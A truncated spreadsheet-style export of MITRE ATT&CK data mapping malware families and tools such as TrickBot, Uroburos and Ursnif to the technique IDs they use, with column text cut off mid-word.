S0263 TYPEFRAMmalware-- software uses T1059.005Visual Basiattack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1059.003Windows Cattack-pat technique [TYPEFRAME
S0263 TYPEFRAMmalware-- software uses T1543.003Windows Se attack-pat technique [TYPEFRAME
S0011 Taidoor malware--bsoftware uses T1005 Data from attack-pat technique [Taidoor](h
S0011 Taidoor malware--bsoftware uses T1140 Deobfuscatattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1055.001Dynamic-linattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1027.013Encrypted/attack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1070.004File Deleti attack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1083 File and Di attack-pat technique [Taidoor](h
S0011 Taidoor malware--bsoftware uses T1105 Ingress Tooattack-pat technique [Taidoor](h
S0011 Taidoor malware--bsoftware uses T1204.002Malicious Fattack-pat technique [Taidoor](h
S0011 Taidoor malware--bsoftware uses T1112 Modify Regattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1106 Native API attack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1095 Non-Applicattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1057 Process Di attack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1012 Query Regiattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1547.001Registry Ruattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1566.001Spearphishattack-pat technique [Taidoor](h
S0011 Taidoor malware--bsoftware uses T1573.001Symmetric attack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1016 System Netattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1124 System Timattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1071.001Web Protocattack-pat technique [Taidoor](
S0011 Taidoor malware--bsoftware uses T1059.003Windows Cattack-pat technique [Taidoor](
S0467 TajMahal malware-- software uses T1560.002Archive viaattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1123 Audio Captattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1119 Automatedattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1020 Automatedattack-pat technique [TajMahal](
[TajMahal](https://attack.mit
S0467 TajMahal malware-- software uses T1115 Clipboard attack-pat technique
S0467 TajMahal malware-- software uses T1005 Data from attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1025 Data from attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1055.001Dynamic-linattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1041 Exfiltratio attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1083 File and Di attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1056.001Keyloggingattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1112 Modify Regattack-pat technique [TajMahal]
S0467 TajMahal malware-- software uses T1027 Obfuscatedattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1120 Peripheral attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1057 Process Di attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1113 Screen Capattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1518.001Security S attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1129 Shared Moattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1518 Software Dattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1539 Steal Web attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1082 System Inf attack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1016 System Netattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1124 System Timattack-pat technique [TajMahal](
S0467 TajMahal malware-- software uses T1125 Video Captattack-pat technique [TajMahal](
S1011 Tarrask malware-- software uses T1564 Hide Artifaattack-pat technique [Tarrask](h
S1011 Tarrask malware-- software uses T1036.004Masquerade attack-pat technique [Tarrask](h
S1011 Tarrask malware-- software uses T1036.005Match Legiattack-pat technique [Tarrask](h
S1011 Tarrask malware-- software uses T1112 Modify Regattack-pat technique [Tarrask](h
S1011 Tarrask malware-- software uses T1053.005Scheduled attack-pat technique [Tarrask](h
S1011 Tarrask malware-- software uses T1134.001Token Impeattack-pat technique [Tarrask](h
S1011 Tarrask malware-- software uses T1059.003Windows Cattack-pat technique [Tarrask](h
S0057 Tasklist tool--2e45 software uses T1057 Process Di attack-pat technique [Tasklist](
S0057 Tasklist tool--2e45 software uses T1518.001Security S attack-pat technique [Tasklist](
S0057 Tasklist tool--2e45 software uses T1007 System Serattack-pat technique [Tasklist](
S0595 ThiefQuestmalware-- software uses T1059.002AppleScripattack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1554 Compromise attack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1486 Data Encryattack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1622 Debugger Eattack-pat technique [ThiefQues
S0595 ThiefQuestmalware-- software uses T1562.001Disable or attack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1041 Exfiltratio attack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1564.001Hidden Fileattack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1105 Ingress Tooattack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1056.001Keyloggingattack-pat technique [ThiefQues
S0595 ThiefQuestmalware-- software uses T1543.001Launch Ageattack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1543.004Launch Da attack-pat technique When runnin
S0595 ThiefQuestmalware-- software uses T1036.005Match Legiattack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1106 Native API attack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1057 Process Di attack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1620 Reflective attack-pat technique [ThiefQues
S0595 ThiefQuestmalware-- software uses T1518.001Security S attack-pat technique [ThiefQuest
S0595 ThiefQuestmalware-- software uses T1497.003Time Basedattack-pat technique [ThiefQues
S0595 ThiefQuestmalware-- software uses T1071.001Web Protocattack-pat technique [ThiefQuest
S0665 ThreatNeedmalware-- software uses T1005 Data from attack-pat technique [ThreatNeed
S0665 ThreatNeedmalware-- software uses T1140 Deobfuscatattack-pat technique [ThreatNeed
S0665 ThreatNeedmalware-- software uses T1027.013Encrypted/attack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1083 File and Di attack-pat technique [ThreatNeed
S0665 ThreatNeedmalware-- software uses T1027.011Fileless St attack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1105 Ingress Tooattack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1204.002Malicious Fattack-pat technique [ThreatNeed
S0665 ThreatNeedmalware-- software uses T1036.005Match Legiattack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1112 Modify Regattack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1547.001Registry Ruattack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1566.001Spearphishattack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1082 System Inf attack-pat technique [ThreatNee
S0665 ThreatNeedmalware-- software uses T1543.003Windows Se attack-pat technique [ThreatNeed
S0668 TinyTurla malware-- software uses T1573.002Asymmetricattack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1005 Data from attack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1008 Fallback C attack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1027.011Fileless St attack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1105 Ingress Tooattack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1036.004Masquerade attack-pat technique [TinyTurla
S0668 TinyTurla malware-- software uses T1036.005Match Legiattack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1112 Modify Regattack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1106 Native API attack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1012 Query Regiattack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1029 Scheduled attack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1569.002Service Ex attack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1071.001Web Protocattack-pat technique [TinyTurla]
S0668 TinyTurla malware-- software uses T1059.003Windows Cattack-pat technique [TinyTurla]
S0004 TinyZBot malware-- software uses T1115 Clipboard attack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1562.001Disable or attack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1056.001Keyloggingattack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1547.001Registry Ruattack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1113 Screen Capattack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1547.009Shortcut Mattack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1059.003Windows Cattack-pat technique [TinyZBot](
S0004 TinyZBot malware-- software uses T1543.003Windows Se attack-pat technique [TinyZBot](
S0671 Tomiris malware-- software uses T1005 Data from attack-pat technique [Tomiris](h
S0671 Tomiris malware-- software uses T1568 Dynamic Reattack-pat technique [Tomiris](h
S0671 Tomiris malware-- software uses T1041 Exfiltratio attack-pat technique [Tomiris](
S0671 Tomiris malware-- software uses T1105 Ingress Tooattack-pat technique [Tomiris](h
S0671 Tomiris malware-- software uses T1053.005Scheduled attack-pat technique [Tomiris](h
S0671 Tomiris malware-- software uses T1027.002Software Pattack-pat technique [Tomiris](h
S0671 Tomiris malware-- software uses T1497.003Time Basedattack-pat technique [Tomiris](h
S0671 Tomiris malware-- software uses T1071.001Web Protocattack-pat technique [Tomiris](h
S0183 Tor tool--ed7dsoftware uses T1573.002Asymmetricattack-pat technique [Tor](https
S0183 Tor tool--ed7dsoftware uses T1090.003Multi-hop attack-pat technique Traffic tra
S0678 Torisma malware-- software uses T1140 Deobfuscatattack-pat technique [Torisma](
S0678 Torisma malware-- software uses T1027.013Encrypted/attack-pat technique [Torisma](
S0678 Torisma malware-- software uses T1480 Execution attack-pat technique [Torisma](h
S0678 Torisma malware-- software uses T1041 Exfiltratio attack-pat technique [Torisma](h
S0678 Torisma malware-- software uses T1106 Native API attack-pat technique [Torisma](h
S0678 Torisma malware-- software uses T1027.002Software Pattack-pat technique [Torisma](
S0678 Torisma malware-- software uses T1132.001Standard Eattack-pat technique [Torisma](
S0678 Torisma malware-- software uses T1573.001Symmetric attack-pat technique [Torisma](
S0678 Torisma malware-- software uses T1082 System Inf attack-pat technique [Torisma](h
S0678 Torisma malware-- software uses T1016 System Netattack-pat technique [Torisma](h
S0678 Torisma malware-- software uses T1049 System Netattack-pat technique [Torisma](
S0678 Torisma malware-- software uses T1124 System Timattack-pat technique [Torisma](h
S0678 Torisma malware-- software uses T1071.001Web Protocattack-pat technique [Torisma](
S0682 TrailBlazer malware-- software uses T1001 Data Obfusattack-pat technique [TrailBlaze
S0682 TrailBlazer malware-- software uses T1001.001Junk Data attack-pat technique [TrailBlaze
S0682 TrailBlazer malware-- software uses T1036 Masqueradattack-pat technique [TrailBlaze
S0682 TrailBlazer malware-- software uses T1071.001Web Protocattack-pat technique [TrailBlaze
S0682 TrailBlazer malware-- software uses T1546.003Windows Ma attack-pat technique [TrailBlaze
S0266 TrickBot malware-- software uses T1542.003Bootkit attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1185 Browser Seattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1553.002Code Signi attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1559.001Componentattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1056.004Credential attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1110.004Credential attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1552.001Credentialsattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1555.003Credential attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1552.002Credentialsattack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1005 Data from attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1140 Deobfuscatattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1562.001Disable or attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1482 Domain Truattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1087.003Email Accoattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1027.013Encrypted/attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1041 Exfiltratio attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1210 Exploitatioattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1090.002External Prattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1008 Fallback C attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1083 File and Di attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1495 Firmware Cattack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1564.003Hidden Wi attack-pat technique TrickBot ha
S0266 TrickBot malware-- software uses T1105 Ingress Tooattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1087.001Local Acco attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1204.002Malicious Fattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1036 Masqueradattack-pat technique The [Trick
S0266 TrickBot malware-- software uses T1112 Modify Regattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1106 Native API attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1135 Network Shattack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1571 Non-Standaattack-pat technique Some [Trick
S0266 TrickBot malware-- software uses T1027 Obfuscatedattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1555.005Password attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1069 Permissionattack-pat technique [TrickBot]
[TrickBot](https://attack.mitr
S0266 TrickBot malware-- software uses T1059.001PowerShellattack-pat technique (Citation: Bitdefender Trickb
S0266 TrickBot malware-- software uses T1057 Process Di attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1055.012Process Hoattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1055 Process Injattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1547.001Registry Ruattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1219 Remote Accattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1018 Remote Sysattack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1053.005Scheduled attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1027.002Software Pattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1566.001Spearphishattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1566.002Spearphishattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1132.001Standard Eattack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1573.001Symmetric attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1082 System Inf attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1016 System Netattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1033 System Own attack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1007 System Serattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1497.003Time Basedattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1021.005VNC attack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1071.001Web Protocattack-pat technique [TrickBot](
S0266 TrickBot malware-- software uses T1059.003Windows Cattack-pat technique [TrickBot]
S0266 TrickBot malware-- software uses T1543.003Windows Se attack-pat technique [TrickBot](
S0094 Trojan.Kar malware-- software uses T1010 Applicatio attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1573.002Asymmetricattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1555.003Credential attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1070.004File Deleti attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1083 File and Di attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1105 Ingress Tooattack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1056.001Keyloggingattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1074.001Local Data attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1003 OS Credentattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1027 Obfuscatedattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1057 Process Di attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1547.001Registry Ruattack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1113 Screen Capattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1027.002Software Pattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1497.001System Cheattack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1082 System Inf attack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1016 System Netattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1049 System Netattack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1033 System Own attack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1055.003Thread Exeattack-pat technique [Trojan.Kar
S0094 Trojan.Kar malware-- software uses T1071.001Web Protocattack-pat technique [Trojan.Ka
S0094 Trojan.Kar malware-- software uses T1059.003Windows Cattack-pat technique [Trojan.Ka
S0001 Trojan.Me malware-- software uses T1542.001System Fi attack-pat technique [Trojan.Meb
S0178 Truvasys malware-- software uses T1036.004Masquerade attack-pat technique To establis
S0178 Truvasys malware-- software uses T1547.001Registry Ruattack-pat technique [Truvasys](
S0647 Turian malware--3software uses T1560.001Archive viaattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1140 Deobfuscatattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1083 File and Di attack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1105 Ingress Tooattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1001.001Junk Data attack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1074.001Local Data attack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1036.004Masquerade attack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1027 Obfuscatedattack-pat technique [Turian](h
S0647 Turian malware--3software uses T1120 Peripheral attack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1059.006Python attack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1547.001Registry Ruattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1113 Screen Capattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1082 System Inf attack-pat technique [Turian](h
S0647 Turian malware--3software uses T1016 System Netattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1033 System Own attack-pat technique [Turian](h
S0647 Turian malware--3software uses T1059.004Unix Shell attack-pat technique [Turian](h
S0647 Turian malware--3software uses T1071.001Web Protocattack-pat technique [Turian](ht
S0647 Turian malware--3software uses T1059.003Windows Cattack-pat technique [Turian](h
S0116 UACMe tool--102 software uses T1548.002Bypass Useattack-pat technique [UACMe](ht
S0333 UBoatRAT malware--5software uses T1197 BITS Jobs attack-pat technique [UBoatRAT](
S0333 UBoatRAT malware--5software uses T1102.002Bidirectio attack-pat technique [UBoatRAT]
S0333 UBoatRAT malware--5software uses T1105 Ingress Tooattack-pat technique [UBoatRAT]
S0333 UBoatRAT malware--5software uses T1057 Process Di attack-pat technique [UBoatRAT]
S0333 UBoatRAT malware--5software uses T1573.001Symmetric attack-pat technique [UBoatRAT](
S0333 UBoatRAT malware--5software uses T1497.001System Cheattack-pat technique [UBoatRAT]
S0333 UBoatRAT malware--5software uses T1071.001Web Protocattack-pat technique [UBoatRAT]
S0333 UBoatRAT malware--5software uses T1059.003Windows Cattack-pat technique [UBoatRAT]
S0275 UPPERCUTmalware--fsoftware uses T1083 File and Di attack-pat technique [UPPERCUT](
S0275 UPPERCUTmalware--fsoftware uses T1105 Ingress Tooattack-pat technique [UPPERCUT]
S0275 UPPERCUTmalware--fsoftware uses T1113 Screen Capattack-pat technique [UPPERCUT]
S0275 UPPERCUTmalware--fsoftware uses T1573.001Symmetric attack-pat technique Some versio
S0275 UPPERCUTmalware--fsoftware uses T1082 System Inf attack-pat technique [UPPERCUT](
S0275 UPPERCUTmalware--fsoftware uses T1016 System Netattack-pat technique [UPPERCUT](
S0275 UPPERCUTmalware--fsoftware uses T1033 System Own attack-pat technique [UPPERCUT](
S0275 UPPERCUTmalware--fsoftware uses T1124 System Timattack-pat technique [UPPERCUT](
S0275 UPPERCUTmalware--fsoftware uses T1071.001Web Protocattack-pat technique [UPPERCUT](
S0275 UPPERCUTmalware--fsoftware uses T1059.003Windows Cattack-pat technique [UPPERCUT]
S0136 USBStealermalware--asoftware uses T1119 Automatedattack-pat technique For all non
S0136 USBStealermalware--asoftware uses T1020 Automatedattack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1092 Communicaattack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1025 Data from attack-pat technique Once a remo
S0136 USBStealermalware--asoftware uses T1027.013Encrypted/attack-pat technique Most string
S0136 USBStealermalware--asoftware uses T1052.001Exfiltratio attack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1070.004File Deleti attack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1083 File and Di attack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1074.001Local Data attack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1036.005Match Legiattack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1120 Peripheral attack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1547.001Registry Ruattack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1091 Replicatio attack-pat technique [USBStealer
S0136 USBStealermalware--asoftware uses T1070.006Timestompattack-pat technique [USBStealer
S0452 USBferry malware-- software uses T1005 Data from attack-pat technique [USBferry](
S0452 USBferry malware-- software uses T1083 File and Di attack-pat technique [USBferry](
S0452 USBferry malware-- software uses T1087.001Local Acco attack-pat technique [USBferry](
S0452 USBferry malware-- software uses T1120 Peripheral attack-pat technique [USBferry]
S0452 USBferry malware-- software uses T1057 Process Di attack-pat technique [USBferry](
S0452 USBferry malware-- software uses T1018 Remote Sysattack-pat technique [USBferry]
S0452 USBferry malware-- software uses T1091 Replicatio attack-pat technique [USBferry](
S0452 USBferry malware-- software uses T1218.011Rundll32 attack-pat technique [USBferry](
S0452 USBferry malware-- software uses T1016 System Netattack-pat technique [USBferry]
S0452 USBferry malware-- software uses T1049 System Netattack-pat technique [USBferry]
S0452 USBferry malware-- software uses T1059.003Windows Cattack-pat technique [USBferry]
S0221 Umbreon malware-- software uses T1078.003Local Acco attack-pat technique [Umbreon](h
S0221 Umbreon malware-- software uses T1095 Non-Applicattack-pat technique [Umbreon](
S0221 Umbreon malware-- software uses T1014 Rootkit attack-pat technique [Umbreon](h
S0221 Umbreon malware-- software uses T1205 Traffic Signattack-pat technique [Umbreon](h
S0221 Umbreon malware-- software uses T1059.003Windows Cattack-pat technique [Umbreon](h
S0130 Unknown Lmalware-- software uses T1555.003Credential attack-pat technique [Unknown L
S0130 Unknown Lmalware-- software uses T1562.001Disable or attack-pat technique [Unknown Lo
S0130 Unknown Lmalware-- software uses T1105 Ingress Tooattack-pat technique [Unknown L
S0130 Unknown Lmalware-- software uses T1056.001Keyloggingattack-pat technique [Unknown L
S0130 Unknown Lmalware-- software uses T1091 Replicatio attack-pat technique [Unknown L
S0130 Unknown Lmalware-- software uses T1082 System Inf attack-pat technique [Unknown L
S0130 Unknown Lmalware-- software uses T1016 System Netattack-pat technique [Unknown L
S0130 Unknown Lmalware-- software uses T1033 System Own attack-pat technique [Unknown L
S0022 Uroburos malware-- software uses T1573.002Asymmetricattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1071.004DNS attack-pat technique [Uroburos](
S0022 Uroburos malware-- software uses T1005 Data from attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1140 Deobfuscatattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1055.001Dynamic-linattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1027.009Embeddedattack-pat technique The [Urobu
S0022 Uroburos malware-- software uses T1027.013Encrypted/attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1008 Fallback C attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1070.004File Deleti attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1083 File and Di attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1027.011Fileless St attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1564.005Hidden Fil attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1105 Ingress Tooattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1559 Inter-Proc attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1001.001Junk Data attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1071.003Mail Protocattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1036.004Masquerade attack-pat technique [Uroburos](
S0022 Uroburos malware-- software uses T1112 Modify Regattack-pat technique [Uroburos](
S0022 Uroburos malware-- software uses T1104 Multi-Stag attack-pat technique Individual
[Uroburos](https://attack.mi
S0022 Uroburos malware-- software uses T1090.003Multi-hop attack-pat technique
S0022 Uroburos malware-- software uses T1106 Native API attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1095 Non-Applicattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1132.002Non-Standaattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1057 Process Di attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1572 Protocol T attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1001.003Protocol o attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1012 Query Regiattack-pat technique [Uroburos](
S0022 Uroburos malware-- software uses T1620 Reflective attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1014 Rootkit attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1027.002Software Pattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1573.001Symmetric attack-pat technique [Uroburos](
S0022 Uroburos malware-- software uses T1082 System Inf attack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1205 Traffic Signattack-pat technique [Uroburos](
S0022 Uroburos malware-- software uses T1071.001Web Protocattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1059.003Windows Cattack-pat technique [Uroburos]
S0022 Uroburos malware-- software uses T1543.003Windows Se attack-pat technique [Uroburos](
S0386 Ursnif malware-- software uses T1185 Browser Seattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1027.010Command aOttack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1559.001Componentattack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1056.004Credential attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1132 Data Encodattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1005 Data from attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1140 Deobfuscatattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1568.002Domain Gen attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1027.013Encrypted/attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1041 Exfiltratio attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1070.004File Deleti attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1564.003Hidden Wi attack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1105 Ingress Tooattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1074.001Local Data attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1036.005Match Legiattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1112 Modify Regattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1090.003Multi-hop attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1106 Native API attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1059.001PowerShellattack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1057 Process Di attack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1055.012Process Hoattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1090 Proxy attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1012 Query Regiattack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1547.001Registry Ruattack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1091 Replicatio attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1113 Screen Capattack-pat technique [Ursnif](h
S0386 Ursnif malware-- software uses T1082 System Inf attack-pat technique [Ursnif](ht
S0386 Ursnif malware-- software uses T1007 System Serattack-pat technique [Ursnif](ht
